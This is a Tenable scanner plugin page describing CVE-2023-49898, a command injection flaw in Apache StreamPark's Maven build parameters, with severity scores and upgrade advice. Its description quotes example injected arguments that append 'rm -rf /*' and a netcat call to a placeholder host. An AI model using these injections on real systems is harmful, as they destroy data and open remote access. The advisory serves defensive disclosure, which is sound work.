SCA: security update for org.apache.streampark:streampark (GHSA-qg44-xqwj-wc28)

high Tenable Cloud Security Plugin ID 418107

Description

There are packages installed that are affected by a vulnerability referenced in the following CVE:

- In streampark, there is a project module that integrates Maven's compilation capability. However, there is
no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command
execution, The prerequisite for a successful attack is that the user needs to log in to the streampark
system and have system-level permissions. Generally, only users of that system have the authorization to
log in, and users would not manually input a dangerous operation command. Therefore, the risk level of
this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize
the splicing method according to the compilation situation of the project, mvn compilation results use &&,
compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 & (CVE-2023-49898)

See Also

https://github.com/advisories/GHSA-qg44-xqwj-wc28

Plugin Details

Severity: High

ID: 418107

Version: Revision 1.13

Type: Local

Family: SCA Checks

Published: 1/23/2025

Updated: 7/2/2026

Supported Sensors: Tenable Cloud Security, Tenable Self-Hosted Container Security

Risk Information

VPR

Risk Factor: Medium

Score: 6.9

Percentile: 97.07

Vendor

Vendor Severity: Critical

CVSS v2

Risk Factor: High

Base Score: 8.3

Temporal Score: 6.1

Vector: CVSS2#AV:N/AC:L/Au:M/C:C/I:C/A:C

CVSS Score Source: CVE-2023-49898

CVSS v3

Risk Factor: High

Base Score: 7.2

Temporal Score: 6.3

Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

Vulnerability Information

Exploit Ease: No known exploits are available

Patch Publication Date: 12/15/2023

Vulnerability Publication Date: 12/15/2023

Reference Information

CVE: CVE-2023-49898

cwe: CWE-77